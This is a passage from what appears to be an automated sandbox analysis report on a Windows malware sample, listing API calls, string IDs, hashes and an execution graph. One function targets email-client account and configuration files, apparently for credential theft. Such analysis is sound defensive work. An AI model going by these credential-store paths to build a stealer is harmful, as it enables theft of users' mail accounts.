                                                                                        • Part of subcall function 37861E89: lstrcatW.KERNEL32(?,378610DF,?,378610DF,?,?,?,00000000), ref: 37861ED3
                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 3786122A
                                                                                        • Part of subcall function 3786173A: _strlen.LIBCMT ref: 37861855
                                                                                        • Part of subcall function 3786173A: _strlen.LIBCMT ref: 37861869
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                      • API String ID: 4036392271-1520055953
                                                                                      • Opcode ID: 510eeb19ffce360b960a717f60dcb4bd788f2f0ccbbc7fa7bc4debade8f86ecc
                                                                                      • Instruction ID: 56c6a97531bb62bdc986f558b3b7f3e9e809166aa9f19806b452a3ad9518641d
                                                                                      • Opcode Fuzzy Hash: 510eeb19ffce360b960a717f60dcb4bd788f2f0ccbbc7fa7bc4debade8f86ecc
                                                                                      • Instruction Fuzzy Hash: 1821F5B9E102487AEB1097A4EC85FED7339EF90718F000556F704EB2D1E6B55D808B5A
                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,37864AEA,?,?,37864A8A,?,37872238,0000000C,37864BBD,00000000,00000000), ref: 37864B59
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 37864B6C
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,37864AEA,?,?,37864A8A,?,37872238,0000000C,37864BBD,00000000,00000000,?,37862082), ref: 37864B8F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: 1e1adc20c531cab16d4adfd410e53f8cc37de60dcf9189ce3712465595edcb7f
                                                                                      • Instruction ID: cb834c5aa5cd340a8a7f9f01517b7982a6c01a1f643318f46ae85c14351e8e62
                                                                                      • Opcode Fuzzy Hash: 1e1adc20c531cab16d4adfd410e53f8cc37de60dcf9189ce3712465595edcb7f
                                                                                      • Instruction Fuzzy Hash: F2F0A471940108BFCF01AF91C80DF9DBFB9EF08369F404194EA09B6140DB349A42CB62
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 3786715C
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 3786717F
                                                                                        • Part of subcall function 378656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 37865702
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 378671A5
                                                                                      • _free.LIBCMT ref: 378671B8
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 378671C7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                      • String ID:
                                                                                      • API String ID: 336800556-0
                                                                                      • Opcode ID: 3bd8deeebd52622d0ef761727379885cd53abc08a9d9e1a3c7c4aa808af910e4
                                                                                      • Instruction ID: c4743c1e714dfc97fcfedd6ee9e3aeba8253e592f68a71aed94348c1fdcf1258
                                                                                      • Opcode Fuzzy Hash: 3bd8deeebd52622d0ef761727379885cd53abc08a9d9e1a3c7c4aa808af910e4
                                                                                      • Instruction Fuzzy Hash: F20188F66052157F27111ABA5C4CE7B6E6EDBD2DA8350012FBF04E7200DE699C0285F5
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,3786636D,37865713,00000000,?,37862249,?,?,37861D66,00000000,?,?,00000000), ref: 37865B7F
                                                                                      • _free.LIBCMT ref: 37865BB4
                                                                                      • _free.LIBCMT ref: 37865BDB
                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37865BE8
                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37865BF1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free
                                                                                      • String ID:
                                                                                      • API String ID: 3170660625-0
                                                                                      • Opcode ID: 56f3cff24cbdf29df179165c6b709f9c2fad7355ecb315ab3584708e1f54b256
                                                                                      • Instruction ID: 5ef2ed25b1d42e9d8da94ac6a8710987d9c6a6fe7c602ac9fa43740f1a1329df
                                                                                      • Opcode Fuzzy Hash: 56f3cff24cbdf29df179165c6b709f9c2fad7355ecb315ab3584708e1f54b256
                                                                                      • Instruction Fuzzy Hash: 5201287A147741BBA6022A381C8DF1F2E2E9FF65BCB200024FB26B6141EF6CC8034536
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,378610DF,?,?,?,00000000), ref: 37861E9A
                                                                                      • lstrcatW.KERNEL32(?,?,?,378610DF,?,?,?,00000000), ref: 37861EAC
                                                                                      • lstrlenW.KERNEL32(?,?,378610DF,?,?,?,00000000), ref: 37861EB3
                                                                                      • lstrlenW.KERNEL32(?,?,378610DF,?,?,?,00000000), ref: 37861EC8
                                                                                      • lstrcatW.KERNEL32(?,378610DF,?,378610DF,?,?,?,00000000), ref: 37861ED3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$lstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 493641738-0
                                                                                      • Opcode ID: 05eb5c29a22273f4b2087b110d3de747afdc6a3a180fc951f9cf1d6c295398c3
                                                                                      • Instruction ID: 51433c2a0649b36e10c5943a48e470e67e7160b43d37c9362f2c4494811a7912
                                                                                      • Opcode Fuzzy Hash: 05eb5c29a22273f4b2087b110d3de747afdc6a3a180fc951f9cf1d6c295398c3
                                                                                      • Instruction Fuzzy Hash: 2DF0893A5401107BD6213B5AAC89F7F7B7CEFD5B74F440019F708A3190DB58684396B6
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 378691D0
                                                                                        • Part of subcall function 3786571E: HeapFree.KERNEL32(00000000,00000000,?,3786924F,?,00000000,?,00000000,?,37869276,?,00000007,?,?,37867E5A,?), ref: 37865734
                                                                                        • Part of subcall function 3786571E: GetLastError.KERNEL32(?,?,3786924F,?,00000000,?,00000000,?,37869276,?,00000007,?,?,37867E5A,?,?), ref: 37865746
                                                                                      • _free.LIBCMT ref: 378691E2
                                                                                      • _free.LIBCMT ref: 378691F4
                                                                                      • _free.LIBCMT ref: 37869206
                                                                                      • _free.LIBCMT ref: 37869218
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: 9a6acf4389d859c0910d8b2571a5dd5dcb578bf54b65489e27701f42e3dbc376
                                                                                      • Instruction ID: 87aec4cd083d5b566b06cbedfaacc13f733844c35eb4d01b68899b1eb9c6af65
                                                                                      • Opcode Fuzzy Hash: 9a6acf4389d859c0910d8b2571a5dd5dcb578bf54b65489e27701f42e3dbc376
                                                                                      • Instruction Fuzzy Hash: 0AF0A4F15451C4BB8520CE58D5CEC16BFD9EB1426D3A40809E629DBD40CB28F8814A51
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 3786536F
                                                                                        • Part of subcall function 3786571E: HeapFree.KERNEL32(00000000,00000000,?,3786924F,?,00000000,?,00000000,?,37869276,?,00000007,?,?,37867E5A,?), ref: 37865734
                                                                                        • Part of subcall function 3786571E: GetLastError.KERNEL32(?,?,3786924F,?,00000000,?,00000000,?,37869276,?,00000007,?,?,37867E5A,?,?), ref: 37865746
                                                                                      • _free.LIBCMT ref: 37865381
                                                                                      • _free.LIBCMT ref: 37865394
                                                                                      • _free.LIBCMT ref: 378653A5
                                                                                      • _free.LIBCMT ref: 378653B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: 63eb263e2198941e3cd39a7b9ae68a2469357150886607ec052dac027842b984
                                                                                      • Instruction ID: dcdfdf51864dfbfa7fe3652ee4c89295731e58fb07ffb16178d33d6c964684fe
                                                                                      • Opcode Fuzzy Hash: 63eb263e2198941e3cd39a7b9ae68a2469357150886607ec052dac027842b984
                                                                                      • Instruction Fuzzy Hash: 34F090708922D5EB8A115F28998E6083FB4B72CA6C359010AF926B7A10D73C0503CF93
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\LrBF2Z930N.exe,00000104), ref: 37864C1D
                                                                                      • _free.LIBCMT ref: 37864CE8
                                                                                      • _free.LIBCMT ref: 37864CF2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$FileModuleName
                                                                                      • String ID: C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                      • API String ID: 2506810119-1362877523
                                                                                      • Opcode ID: 1258ec3a6de4fbc7dc1ea385b3b57806360fed08611d6c8d674f4eb1545e93e7
                                                                                      • Instruction ID: 9473a2c5cbd06679541cbd7ced13ca03f3faee7dc6a96283e27330c3c6f9f976
                                                                                      • Opcode Fuzzy Hash: 1258ec3a6de4fbc7dc1ea385b3b57806360fed08611d6c8d674f4eb1545e93e7
                                                                                      • Instruction Fuzzy Hash: 7A31A475A00348BFDB11CF998888E9EBFFCEB99768F104056EA08A7300D6759B41CB52
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,37866FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 37868731
                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 378687BA
                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 378687CC
                                                                                      • __freea.LIBCMT ref: 378687D5
                                                                                        • Part of subcall function 378656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 37865702
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                      • String ID:
                                                                                      • API String ID: 2652629310-0
                                                                                      • Opcode ID: 825da48d30cd213b9ba799aabaa5b31ece320faa2a3c2ad22ba2cbe58b257c01
                                                                                      • Instruction ID: 649d04c0cfe8588dad637a2980a9428ae3c5bc7021a3825df2e7ef2991d19aad
                                                                                      • Opcode Fuzzy Hash: 825da48d30cd213b9ba799aabaa5b31ece320faa2a3c2ad22ba2cbe58b257c01
                                                                                      • Instruction Fuzzy Hash: EE31E57690020ABBDF148F64CC49EAF7BA5EB54328F000568EE18E7150EB39D991DB91
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,37861D66,00000000,00000000,?,37865C88,37861D66,00000000,00000000,00000000,?,37865E85,00000006,FlsSetValue), ref: 37865D13
                                                                                      • GetLastError.KERNEL32(?,37865C88,37861D66,00000000,00000000,00000000,?,37865E85,00000006,FlsSetValue,3786E190,FlsSetValue,00000000,00000364,?,37865BC8), ref: 37865D1F
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,37865C88,37861D66,00000000,00000000,00000000,?,37865E85,00000006,FlsSetValue,3786E190,FlsSetValue,00000000), ref: 37865D2D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 3177248105-0
                                                                                      • Opcode ID: a164ffd352fd803c7951108bf07b58beb7f1323f9ab514aaeb90814ddafb3f4e
                                                                                      • Instruction ID: 038dd633acaa8895ea3ff9a6f49f15725f229749e89be8b7aee062df31d2afad
                                                                                      • Opcode Fuzzy Hash: a164ffd352fd803c7951108bf07b58beb7f1323f9ab514aaeb90814ddafb3f4e
                                                                                      • Instruction Fuzzy Hash: AB01B13A643326BBD7115E698C4DB563B98AF156F9B100630EB2AF7180DB24D802CAE0
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 3786655C
                                                                                        • Part of subcall function 378662BC: IsProcessorFeaturePresent.KERNEL32(00000017,378662AB,00000000,?,?,?,?,00000016,?,?,378662B8,00000000,00000000,00000000,00000000,00000000), ref: 378662BE
                                                                                        • Part of subcall function 378662BC: GetCurrentProcess.KERNEL32(C0000417), ref: 378662E0
                                                                                        • Part of subcall function 378662BC: TerminateProcess.KERNEL32(00000000), ref: 378662E7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                      • String ID: *?$.
                                                                                      • API String ID: 2667617558-3972193922
                                                                                      • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                      • Instruction ID: 1c6f94b021785eb426d2b0cab7ce4e30fd8542421220ad70a35d622db58e60c6
                                                                                      • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                      • Instruction Fuzzy Hash: 4251A275E0024AFFDB04CFA8C889BADBBF5EF58368F248169D654E7304E6359A01CB50
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strlen
                                                                                      • String ID: : $Se.
                                                                                      • API String ID: 4218353326-4089948878
                                                                                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                      • Instruction ID: 618c4726faed692e2e480a97797e6330d2b373564b96daf52fbc28998c397d8a
                                                                                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                      • Instruction Fuzzy Hash: 6311E775D00248BEDB11CFACD844BDDFBFDAF29218F104056E655E7212E6745B02CB65
                                                                                      APIs
                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 37862903
                                                                                        • Part of subcall function 378635D2: RaiseException.KERNEL32(?,?,?,37862925,00000000,00000000,00000000,?,?,?,?,?,37862925,?,378721B8), ref: 37863632
                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 37862920
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                      • String ID: Unknown exception
                                                                                      • API String ID: 3476068407-410509341
                                                                                      • Opcode ID: 55851b67747ead8fcf6973ecece9cf1db04796130b5f5fbe5eacdf8b998649d5
                                                                                      • Instruction ID: 6ea9ddd5fbd96fe629c54620ef3a02f7f4f5c15bd6a4cecf4cc516c4852692ee
                                                                                      • Opcode Fuzzy Hash: 55851b67747ead8fcf6973ecece9cf1db04796130b5f5fbe5eacdf8b998649d5
                                                                                      • Instruction Fuzzy Hash: 8FF0D63490030C778B00AAA8EC0C96D776D5F3166CF9041A0AB24E6590EF39EA25C992

                                                                                      Execution Graph

                                                                                      Execution Coverage:6.4%
                                                                                      Dynamic/Decrypted Code Coverage:9.2%
                                                                                      Signature Coverage:3.2%
                                                                                      Total number of Nodes:2000
                                                                                      Total number of Limit Nodes:81
                                                                                      execution_graph 37631 415321 realloc 37632 41534d 37631->37632 37633 415340 37631->37633 37635 416760 11 API calls 37632->37635 37635->37633 37636 44dea5 37637 44deb5 FreeLibrary 37636->37637 37638 44dec3 37636->37638 37637->37638 37639 4287c1 37640 4287d2 37639->37640 37643 429ac1 37639->37643 37644 428818 37640->37644 37645 42881f 37640->37645 37654 425711 37640->37654 37641 4259da 37702 416760 11 API calls 37641->37702 37673 425ad6 37643->37673 37709 415c56 11 API calls 37643->37709 37676 42013a 37644->37676 37704 420244 97 API calls 37645->37704 37647 4260dd 37703 424251 120 API calls 37647->37703 37650 4259c2 37650->37673 37696 415c56 11 API calls 37650->37696 37654->37641 37654->37643 37654->37650 37657 429a4d 37654->37657 37660 422aeb memset memcpy memcpy 37654->37660 37664 4260a1 37654->37664 37672 425a38 37654->37672 37692 4227f0 memset memcpy 37654->37692 37693 422b84 15 API calls 37654->37693 37694 422b5d memset memcpy memcpy 37654->37694 37695 422640 13 API calls 37654->37695 37697 4241fc 11 API calls 37654->37697 37698 42413a 90 API calls 37654->37698 37658 429a66 37657->37658 37659 429a9b 37657->37659 37705 415c56 11 API calls 37658->37705 37663 429a96 37659->37663 37707 416760 11 API calls 37659->37707 37660->37654 37708 424251 120 API calls 37663->37708 37701 415c56 11 API calls 37664->37701 37666 429a7a 37706 416760 11 API calls 37666->37706 37672->37650 37699 422640 13 API calls 37672->37699 37700 4226e0 12 API calls 37672->37700 37677 42014c 37676->37677 37680 420151 37676->37680 37719 41e466 97 API calls 37677->37719 37679 420162 37679->37654 37680->37679 37681 4201b3 37680->37681 37682 420229 37680->37682 37683 4201b8 37681->37683 37684 4201dc 37681->37684 37682->37679 37685 41fd5e 86 API calls 37682->37685 37710 41fbdb 37683->37710 37684->37679 37688 4201ff 37684->37688 37716 41fc4c 37684->37716 37685->37679 37688->37679 37691 42013a 97 API calls 37688->37691 37691->37679 37692->37654 37693->37654 37694->37654 37695->37654 37696->37641 37697->37654 37698->37654 37699->37672 37700->37672 37701->37641 37702->37647 37703->37673 37704->37654 37705->37666 37706->37663 37707->37663 37708->37643 37709->37641 37711 41fbf1 37710->37711 37712 41fbf8 37710->37712 37715 41fc39 37711->37715 37734 4446ce 11 API calls 37711->37734 37724 41ee26 37712->37724 37715->37679 37720 41fd5e 37715->37720 37717 41ee6b 86 API calls 37716->37717 37718 41fc5d 37717->37718 37718->37684 37719->37680 37723 41fd65 37720->37723 37721 41fdab 37721->37679 37722 41fbdb 86 API calls 37722->37723 37723->37721 37723->37722 37725 41ee41 37724->37725 37726 41ee32 37724->37726 37735 41edad 37725->37735 37738 4446ce 11 API calls 37726->37738 37729 41ee3c 37729->37711 37732 41ee58 37732->37729 37740 41ee6b 37732->37740 37734->37715 37744 41be52 37735->37744 37738->37729 37739 41eb85 11 API calls 37739->37732 37741 41ee70 37740->37741 37742 41ee78 37740->37742 37800 41bf99 86 API calls 37741->37800 37742->37729 37745 41be6f 37744->37745 37746 41be5f 37744->37746 37751 41be8c 37745->37751 37765 418c63 37745->37765 37779 4446ce 11 API calls 37746->37779 37748 41be69 37748->37729 37748->37739 37751->37748 37752 41bf3a 37751->37752 37754 41bed1 37751->37754 37755 41bee7 37751->37755 37782 4446ce 11 API calls 37752->37782 37756 41bef0 37754->37756 37758 41bee2 37754->37758 37755->37748 37783 41a453 86 API calls 37755->37783 37756->37755 37757 41bf01 37756->37757 37759 41bf24 memset 37757->37759 37761 41bf14 37757->37761 37780 418a6d memset memcpy memset 37757->37780 37769 41ac13 37758->37769 37759->37748 37781 41a223 memset memcpy memset 37761->37781 37764 41bf20 37764->37759 37767 418c72 37765->37767 37766 418c94 37766->37751 37767->37766 37768 418d51 memset memset 37767->37768 37768->37766 37770 41ac3f memset 37769->37770 37771 41ac52 37769->37771 37776 41acd9 37770->37776 37773 41ac6a 37771->37773 37784 41dc14 19 API calls 37771->37784 37774 41aca1 37773->37774 37785 41519d 37773->37785 37774->37776 37777 41acc0 memset 37774->37777 37778 41accd memcpy 37774->37778 37776->37755 37777->37776 37778->37776 37779->37748 37780->37761 37781->37764 37782->37755 37784->37773 37788 4175ed 37785->37788 37796 417570 SetFilePointer 37788->37796 37791 41760a ReadFile 37792 417637 37791->37792 37793 417627 GetLastError 37791->37793 37794 4151b3 37792->37794 37795 41763e memset 37792->37795 37793->37794 37794->37774 37795->37794 37797 41759c GetLastError 37796->37797 37799 4175b2 37796->37799 37798 4175a8 GetLastError 37797->37798 37797->37799 37798->37799 37799->37791 37799->37794 37800->37742 37801 417bc5 37802 417c61 37801->37802 37803 417bda 37801->37803 37803->37802 37804 417bf6 UnmapViewOfFile CloseHandle 37803->37804 37806 417c2c 37803->37806 37808 4175b7 37803->37808 37804->37803 37804->37804 37806->37803 37813 41851e 20 API calls 37806->37813 37809 4175d6 CloseHandle 37808->37809 37810 4175c8 37809->37810 37811 4175df 37809->37811 37810->37811 37812 4175ce Sleep 37810->37812 37811->37803 37812->37809 37813->37806 37814 4152c7 malloc 37815 4152ef 37814->37815 37817 4152e2 37814->37817 37818 416760 11 API calls 37815->37818 37818->37817 37819 415308 free 37820 41276d 37821 41277d 37820->37821 37863 4044a4 LoadLibraryW 37821->37863 37823 412785 37824 412789 37823->37824 37871 414b81 37823->37871 37827 4127c8 37877 412465 memset ??2@YAPAXI 37827->37877 37829 4127ea 37889 40ac21 37829->37889 37834 412813 37907 40dd07 memset 37834->37907 37835 412827 37912 40db69 memset 37835->37912 37838 412822 37933 4125b6 ??3@YAXPAX 37838->37933 37840 40ada2 _wcsicmp 37842 41283d 37840->37842 37842->37838 37845 412863 CoInitialize 37842->37845 37917 41268e 37842->37917 37937 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37845->37937 37848 41296f 37939 40b633 37848->37939 37850 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37855 412957 CoUninitialize 37850->37855 37860 4128ca 37850->37860 37855->37838 37856 4128d0 TranslateAcceleratorW 37857 412941 GetMessageW 37856->37857 37856->37860 37857->37855 37857->37856 37858 412909 IsDialogMessageW 37858->37857 37858->37860 37859 4128fd IsDialogMessageW 37859->37857 37859->37858 37860->37856 37860->37858 37860->37859 37861 41292b TranslateMessage DispatchMessageW 37860->37861 37862 41291f IsDialogMessageW 37860->37862 37861->37857 37862->37857 37862->37861 37864 4044f7 37863->37864 37865 4044cf GetProcAddress 37863->37865 37869 404507 MessageBoxW 37864->37869 37870 40451e 37864->37870 37866 4044e8 FreeLibrary 37865->37866 37867 4044df 37865->37867 37866->37864 37868 4044f3 37866->37868 37867->37866 37868->37864 37869->37823 37870->37823 37872 414b8a 37871->37872 37873 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37871->37873 37943 40a804 memset 37872->37943 37873->37827 37876 414b9e GetProcAddress 37876->37873 37878 4124e0 37877->37878 37879 412505 ??2@YAPAXI 37878->37879 37880 41251c 37879->37880 37885 412521 37879->37885 37965 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37880->37965 37954 444722 37885->37954 37888 41259b wcscpy 37888->37829 37970 40b1ab free free 37889->37970 37891 40ad76 37971 40aa04 37891->37971 37894 40a9ce malloc memcpy free free 37897 40ac5c 37894->37897 37895 40ad4b 37895->37891 37994 40a9ce 37895->37994 37897->37891 37897->37894 37897->37895 37898 40ace7 free 37897->37898 37974 40a8d0 37897->37974 37986 4099f4 37897->37986 37898->37897 37902 40a8d0 7 API calls 37902->37891 37903 40ada2 37904 40adc9 37903->37904 37905 40adaa 37903->37905 37904->37834 37904->37835 37905->37904 37906 40adb3 _wcsicmp 37905->37906 37906->37904 37906->37905 37999 40dce0 37907->37999 37909 40dd3a GetModuleHandleW 38004 40dba7 37909->38004 37913 40dce0 3 API calls 37912->37913 37914 40db99 37913->37914 38076 40dae1 37914->38076 38090 402f3a 37917->38090 37919 412766 37919->37838 37919->37845 37920 4126d3 _wcsicmp 37921 4126a8 37920->37921 37921->37919 37921->37920 37923 41270a 37921->37923 38124 